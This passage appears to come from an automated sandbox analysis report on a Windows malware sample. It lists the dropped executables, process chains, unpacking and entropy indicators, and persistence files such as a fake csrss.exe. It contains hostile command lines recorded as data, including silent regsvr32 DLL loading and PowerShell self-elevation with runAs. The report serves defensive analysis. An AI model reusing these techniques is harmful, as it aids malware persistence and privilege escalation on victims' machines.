                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: ccQGH1mKws.exeReversingLabs: Detection: 81%
                  Source: unknownProcess created: C:\Users\user\Desktop\ccQGH1mKws.exe C:\Users\user\Desktop\ccQGH1mKws.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\afratej C:\Users\user\AppData\Roaming\afratej
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8E91.exe C:\Users\user\AppData\Local\Temp\8E91.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe C:\Users\user\AppData\Local\Temp\93D2.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe "C:\Users\user\AppData\Local\Temp\93D2.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe C:\Users\user\AppData\Local\Temp\A6A0.exe
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp "C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp" /SL5="$20424,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe "C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp "C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp" /SL5="$20434,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB62.exe C:\Users\user\AppData\Local\Temp\BB62.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8E91.exe C:\Users\user\AppData\Local\Temp\8E91.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe C:\Users\user\AppData\Local\Temp\93D2.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe C:\Users\user\AppData\Local\Temp\A6A0.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB62.exe C:\Users\user\AppData\Local\Temp\BB62.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpWindow found: window name: TMainForm
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeUnpacked PE file: 1.2.ccQGH1mKws.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bizope:W;.tls:W;.homupin:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\afratejUnpacked PE file: 6.2.afratej.400000.0.unpack .text:ER;.rdata:R;.data:W;.bizope:W;.tls:W;.homupin:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.cab7:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeUnpacked PE file: 39.2.DC49.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rofi:W;.tls:W;.rehopeb:R;.jidexi:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004165C0 LoadLibraryW,GetProcAddress,VirtualProtect,1_2_004165C0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .
                  Source: vueqjgslwynd.exe.43.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                  Source: A6A0.tmp.20.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                  Source: is-88CHK.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xb9261
                  Source: BroomSetup.exe.34.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                  Source: anyburnfree.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                  Source: INetC.dll.34.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                  Source: 288c47bbc1871b439df19ff4df68f076.exe.29.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
                  Source: 97EA.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1baa0b
                  Source: BB62.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x8be514
                  Source: A6A0.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x7f9fb2
                  Source: _isdecmp.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x5528
                  Source: _iscrypt.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                  Source: _setup64.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x8546
                  Source: FourthX.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                  Source: A6A0.tmp.17.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                  Source: InstallSetup4.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                  Source: ccQGH1mKws.exeStatic PE information: section name: .bizope
                  Source: ccQGH1mKws.exeStatic PE information: section name: .homupin
                  Source: DC49.exe.2.drStatic PE information: section name: .rofi
                  Source: DC49.exe.2.drStatic PE information: section name: .rehopeb
                  Source: DC49.exe.2.drStatic PE information: section name: .jidexi
                  Source: 8837.exe.2.drStatic PE information: section name: .fofufe
                  Source: 8837.exe.2.drStatic PE information: section name: .safaz
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: E33F.exe.2.drStatic PE information: section name: .wet
                  Source: E33F.exe.2.drStatic PE information: section name: .mixifi
                  Source: E33F.exe.2.drStatic PE information: section name: .civo
                  Source: afratej.2.drStatic PE information: section name: .bizope
                  Source: afratej.2.drStatic PE information: section name: .homupin
                  Source: vfratej.2.drStatic PE information: section name: .rofi
                  Source: vfratej.2.drStatic PE information: section name: .rehopeb
                  Source: vfratej.2.drStatic PE information: section name: .jidexi
                  Source: csrss.exe.8.drStatic PE information: section name: .fofufe
                  Source: csrss.exe.8.drStatic PE information: section name: .safaz
                  Source: anyburnfree.exe.21.drStatic PE information: section name: .cab7
                  Source: is-37AOI.tmp.21.drStatic PE information: section name: /4
                  Source: is-7865G.tmp.21.drStatic PE information: section name: /4
                  Source: is-VTCPG.tmp.21.drStatic PE information: section name: /4
                  Source: is-MN9TN.tmp.21.drStatic PE information: section name: /4
                  Source: is-IGFK1.tmp.21.drStatic PE information: section name: /4
                  Source: is-NDO9R.tmp.21.drStatic PE information: section name: /4
                  Source: is-8B8M3.tmp.21.drStatic PE information: section name: /4
                  Source: is-ETRFM.tmp.21.drStatic PE information: section name: /4
                  Source: is-AQ5SU.tmp.21.drStatic PE information: section name: /4
                  Source: is-AQ01D.tmp.21.drStatic PE information: section name: /4
                  Source: is-TU931.tmp.21.drStatic PE information: section name: /4
                  Source: is-30U3A.tmp.21.drStatic PE information: section name: /4
                  Source: is-RGLU2.tmp.21.drStatic PE information: section name: /4
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: section name: .cab7
                  Source: FourthX.exe.29.drStatic PE information: section name: .00cfg
                  Source: BroomSetup.exe.34.drStatic PE information: section name: .didata
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .sowa
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .xeyekus
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .jejol
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .sowa
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .xeyekus
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .jejol
                  Source: vueqjgslwynd.exe.43.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00403253 push eax; ret 1_2_0040332D
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401C64 push es; retf 1_2_00401C83
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0040332A push eax; ret 1_2_0040332D
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00402F91 push 60B44389h; retf 1_2_00402FAB
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041AEDC push 3BFFFFFFh; retf 1_2_0041AEE1
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00416EB0 push ecx; mov dword ptr [esp], 000343F0h1_2_00416EB1
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F1CCB push es; retf 1_2_004F1CEA
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F2FF8 push 60B44389h; retf 1_2_004F3012
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00403253 push eax; ret 6_2_0040332D
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401C64 push es; retf 6_2_00401C83
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0040332A push eax; ret 6_2_0040332D
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041AEDC push 3BFFFFFFh; retf 6_2_0041AEE1
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00416EB0 push ecx; mov dword ptr [esp], 000343F0h6_2_00416EB1
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C1CCB push es; retf 6_2_006C1CEA
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C2FF8 push 60B44389h; retf 6_2_006C3012
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CB960 push ecx; mov dword ptr [esp], 000343F0h7_2_005CB961
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00401E25 push ecx; ret 7_2_00401E38
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_023FB2EF push ebx; iretd 7_2_023FB2F7
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0244F70A pushad ; ret 7_2_0244F70C
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024B57ED push ebp; retf 7_2_024B57EE
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024ED7F8 push edx; retf 7_2_024ED7F9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024B580A push 5A36841Dh; retf 7_2_024B5825
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024ED4BD push cs; ret 7_2_024ED4BE
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_0040A3BD push eax; retf 10_2_0040A3BE
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_033B30A0 push esp; iretd | 15_2_033B30A7
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_0040A3BD push eax; retf | 16_2_0040A3BE
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_029B049D push cs; ret | 24_2_029B049E
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_029B07D8 push edx; retf | 24_2_029B07D9
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_028BE2CF push ebx; iretd | 24_2_028BE2D7
                  Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_029787CD push ebp; retf | 24_2_029787CE
                  Source: ccQGH1mKws.exe | Static PE information: section name: .text entropy: 7.241912923688238
                  Source: 97EA.dll.2.dr | Static PE information: section name: .text entropy: 7.994843734766698
                  Source: DC49.exe.2.dr | Static PE information: section name: .text entropy: 7.2499716488738954
                  Source: 8837.exe.2.dr | Static PE information: section name: .text entropy: 7.985255731332923
                  Source: E33F.exe.2.dr | Static PE information: section name: .text entropy: 7.23594445208119
                  Source: 671C.exe.2.dr | Static PE information: section name: .text entropy: 7.78984089955939
                  Source: afratej.2.dr | Static PE information: section name: .text entropy: 7.241912923688238
                  Source: vfratej.2.dr | Static PE information: section name: .text entropy: 7.2499716488738954
                  Source: csrss.exe.8.dr | Static PE information: section name: .text entropy: 7.985255731332923
                  Source: anyburnfree.exe.21.dr | Static PE information: section name: .text entropy: 7.703107959057831
                  Source: IMAP List Mailboxes 65.exe.27.dr | Static PE information: section name: .text entropy: 7.703107959057831
                  Source: syncUpd[1].exe.34.dr | Static PE information: section name: .text entropy: 7.5073579685533876
                  Source: nsfDE87.tmp.34.dr | Static PE information: section name: .text entropy: 7.5073579685533876

                  Persistence and Installation Behavior

                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 10_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE0 | 16_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | File created: C:\ProgramData\Drivers\csrss.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-8B8M3.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | File created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | File created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | File created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-VTCPG.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-ETRFM.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-NDO9R.tmp
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BB62.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-DCV21.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\is-7865G.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp | File created: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe | File created: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exe
